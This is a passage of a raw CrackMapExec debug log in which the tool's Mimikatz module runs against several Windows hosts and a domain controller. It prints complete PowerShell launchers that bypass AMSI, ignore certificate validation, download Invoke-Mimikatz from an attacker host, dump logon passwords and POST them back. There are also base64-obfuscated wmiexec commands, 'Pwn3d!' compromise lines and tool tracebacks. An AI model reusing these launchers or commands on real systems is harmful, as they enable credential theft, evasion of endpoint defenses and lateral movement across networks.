$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Target system is ACSEPM.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\ACSEPM[\\PIPE\\atsvc] | |
DEBUG StringBinding: acsepm[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:ACSEPM.sometarget.com[49154] | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv jQ -;sv fT ec;sv YW ((gv jQ).value.toString()+(gv fT).value.toString());powershell (gv YW).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
MIMIKATZ 172.23.2.120 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ SRV5.sometarget.com 445 SRV5 [+] Executed launcher | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
MIMIKATZ SRV4.sometarget.com 445 SRV4 [+] Executed launcher | |
MIMIKATZ ACSEPM.sometarget.com 445 ACSEPM [+] Executed launcher | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CAZDC01.sometarget.com 445 CAZDC01 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Target system is CAZDC01.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CAZDC01[\\PIPE\\atsvc] | |
DEBUG StringBinding: CAZDC01[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CAZDC01.sometarget.com[49154] | |
MIMIKATZ 172.28.2.11 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ 172.23.2.72 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.72', 56456) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.98 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB SRV6.sometarget.com 445 SRV6 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ 172.27.2.121 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Target system is SRV6.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\SRV6[\\PIPE\\atsvc] | |
DEBUG StringBinding: SRV6[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:SRV6.sometarget.com[49154] | |
MIMIKATZ 172.23.2.29 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.29', 61732) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
MIMIKATZ 172.23.3.86 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ CAZDC01.sometarget.com 445 CAZDC01 [+] Executed launcher | |
MIMIKATZ 172.23.2.244 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv fc -;sv BW ec;sv tV ((gv fc).value.toString()+(gv BW).value.toString());powershell (gv tV).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAc